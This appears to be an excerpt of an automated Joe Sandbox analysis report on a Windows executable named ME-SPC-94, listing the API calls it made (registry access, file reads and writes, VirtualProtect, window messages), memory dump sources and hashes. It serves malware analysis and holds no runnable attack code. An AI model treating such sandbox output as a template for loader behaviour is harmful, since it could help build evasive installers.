                                                  • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: EnumErrorLastWindows
                                                  • String ID:
                                                  • API String ID: 14984897-0
                                                  • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                  • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                  • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                  • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                  APIs
                                                    • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                  • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                  • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                  • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                  • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                  • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                  • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                  APIs
                                                    • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteOpenValue
                                                  • String ID:
                                                  • API String ID: 849931509-0
                                                  • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                  • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                  • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                  • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000,?), ref: 00401DDD
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                  • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                  • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                  • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                  • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                  • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                  • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                  • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                  • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                  • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                  • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                  • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                  • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                  • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                  • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                  • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                  APIs
                                                  • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                  • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                  • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                  • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                  • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                  • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                  • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                  • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                  • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                  • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                  • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                  • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                  • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                  • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                  • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                  • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
